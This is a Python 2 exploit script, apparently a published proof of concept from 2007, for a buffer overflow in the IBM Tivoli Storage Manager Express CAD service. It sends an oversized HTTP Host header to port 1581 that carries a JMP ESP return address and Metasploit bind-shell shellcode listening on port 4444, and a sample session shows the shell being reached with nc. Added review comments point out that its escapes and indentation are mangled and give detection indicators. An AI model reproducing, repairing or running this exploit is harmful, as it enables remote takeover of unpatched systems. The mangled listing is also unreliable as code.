# Title : IBM Tivoli Storage Manager 5.3 Express CAD Service BoF Exploit
# Published : 2007-10-27
# Author : muts
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# E:\Program Files\Tivoli\TSM\baclient>
import socket
import sys
# Banner. These are Python 2 print statements (no parentheses), so the
# listing as shown targets a Python 2 interpreter.
print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
print "[*] http://www.offensive-security.com"
def usage():
# Print the expected invocation and exit with status 1.
# NOTE(review): the function body has lost its indentation in this listing
# (both statements sit at column 0), so the text as printed is not valid Python.
print "[*] Usage: ./dsmcad.py <host>"
sys.exit(1)
# Exactly one positional argument (the target host) is required; usage() exits otherwise.
# NOTE(review): the call below is at column 0 in this listing, so the `if` has no indented body as printed.
if len(sys.argv) != 2:
usage()
# The oversized value that is later placed in the HTTP Host header (see the send() below).
# It is built in three parts: filler text, a four-byte value the author labels as a
# return address, and a payload string the author labels as a bind shell on port 4444.
# Note that `buffer` shadows the Python 2 builtin of the same name.
buffer="BirdsflyinghighyouknowhowIfeel"
buffer+="SunintheskyyouknowhowIfeel"
buffer+="ReeedsdriftinonbyyouknowhowIfeel"
buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"
# NOTE(review): the author's comment names User32.dll on Win2k SP0 EN, while the
# header says the script was tested on Windows 2003 Server SP0; the value is tied to one
# specific OS build either way. As printed, the escape sequences throughout this block
# are mangled (no backslashes), so the listing is not functional as shown — it is of
# historical/detection interest only.
buffer+="x38x07xD2x77" #77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
buffer+="x90"*4
# Payload string. The author's comment (next line) attributes it to the Metasploit
# win32_bind module: bind shell on TCP 4444, Alpha2 encoder, 696 bytes. Defender note:
# an unexpected listener on 4444 appearing on a TSM client host after a request to the
# CAD port is the post-exploitation indicator this script relies on.
buffer+=(
# win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x37x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x50x30x41x31x42x41x6bx41x41x71x41x32x41x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x68x69x49x6cx31"
"x7ax68x6bx62x6dx49x78x4bx49x39x6fx6bx4fx39x6fx33"
"x50x4ex6bx52x4cx34x64x74x64x6ex6bx42x65x67x4cx6c"
"x4bx41x6cx46x65x42x58x57x71x7ax4fx6cx4bx50x4fx65"
"x48x4ex6bx71x4fx51x30x37x71x58x6bx77x39x4ex6bx75"
"x64x4cx4bx53x31x5ax4ex44x71x4bx70x6fx69x6ex4cx6c"
"x44x69x50x42x54x45x57x4fx31x7ax6ax36x6dx54x41x6b"
"x72x78x6bx69x64x47x4bx50x54x36x44x64x68x43x45x4a"
"x45x6ex6bx41x4fx56x44x65x51x48x6bx75x36x6cx4bx64"
"x4cx50x4bx6ex6bx71x4fx77x6cx34x41x48x6bx53x33x66"
"x4cx6ex6bx4bx39x30x6cx36x44x65x4cx51x71x4fx33x57"
"x41x39x4bx71x74x4cx4bx50x43x76x50x4ex6bx41x50x54"
"x4cx6ex6bx32x50x45x4cx4cx6dx6ex6bx47x30x36x68x73"
"x6ex32x48x6cx4ex30x4ex56x6ex5ax4cx56x30x6bx4fx4b"
"x66x71x76x62x73x31x76x45x38x74x73x76x52x71x78x63"
"x47x63x43x76x52x31x4fx41x44x79x6fx4ex30x65x38x58"
"x4bx48x6dx4bx4cx75x6bx72x70x6bx4fx7ax76x71x4fx6f"
"x79x6dx35x51x76x6cx41x58x6dx65x58x57x72x73x65x73"
"x5ax44x42x49x6fx6ex30x31x78x4ex39x64x49x6ax55x4e"
"x4dx53x67x79x6fx6ex36x41x43x31x43x46x33x73x63x42"
"x73x30x43x41x43x32x63x70x53x4bx4fx38x50x43x56x71"
"x78x74x51x33x6cx31x76x70x53x4ex69x5ax41x4dx45x41"
"x78x4cx64x35x4ax30x70x6bx77x52x77x6bx4fx6ex36x62"
"x4ax34x50x72x71x76x35x69x6fx4ex30x45x38x6ex44x4c"
"x6dx46x4ex4dx39x46x37x59x6fx4bx66x30x53x62x75x49"
"x6fx38x50x63x58x6bx55x37x39x4ex66x71x59x41x47x6b"
"x4fx5ax76x70x50x51x44x31x44x70x55x6bx4fx68x50x6e"
"x73x71x78x59x77x70x79x5ax66x71x69x66x37x6bx4fx6a"
"x76x52x75x4bx4fx5ax70x71x76x31x7ax55x34x31x76x72"
"x48x50x63x72x4dx6fx79x78x65x53x5ax72x70x72x79x76"
"x49x78x4cx4bx39x4dx37x53x5ax32x64x6dx59x6ax42x37"
"x41x6bx70x4bx43x4fx5ax49x6ex63x72x56x4dx49x6ex30"
"x42x64x6cx6dx43x6cx4dx62x5ax75x68x6cx6bx6ex4bx6e"
"x4bx50x68x43x42x49x6ex6cx73x62x36x69x6fx74x35x30"
"x44x6bx4fx48x56x53x6bx70x57x73x62x71x41x70x51x76"
"x31x63x5ax57x71x42x71x66x31x72x75x71x41x49x6fx68"
"x50x75x38x4cx6dx79x49x74x45x5ax6ex32x73x4bx4fx6e"
"x36x72x4ax6bx4fx6bx4fx50x37x79x6fx4ex30x6ex6bx46"
"x37x69x6cx4fx73x69x54x52x44x49x6fx4bx66x43x62x6b"
"x4fx5ax70x51x78x7ax50x4fx7ax76x64x31x4fx33x63x4b"
"x4fx48x56x49x6fx48x50x61")
# Open a plain TCP connection to the target on port 1581, which this script treats as
# the CAD service port. No timeout is set, so a filtered port blocks indefinitely.
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[*] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 1581 ) )
print "[*] Sending evil buffer, ph33r"
# A single HTTP/1.0 GET for /BACLIENT whose Host header carries the oversized value.
# Detection note: a Host header on the CAD port that is far longer than any hostname
# and is not a hostname at all is the on-the-wire signature of this attempt.
# NOTE(review): the line terminators are mangled in this listing ('rn' rather than CRLF
# escapes), consistent with the rest of the file not being runnable as printed.
expl.send ( 'GET /BACLIENT HTTP/1.0rnHost: 192.168.1.1 '+ buffer+'rnrn')
expl.close()
# Nothing is read back; success is judged only by the out-of-band check on port 4444
# described in the header comment.
print "[*] Check port 4444 for bindshell"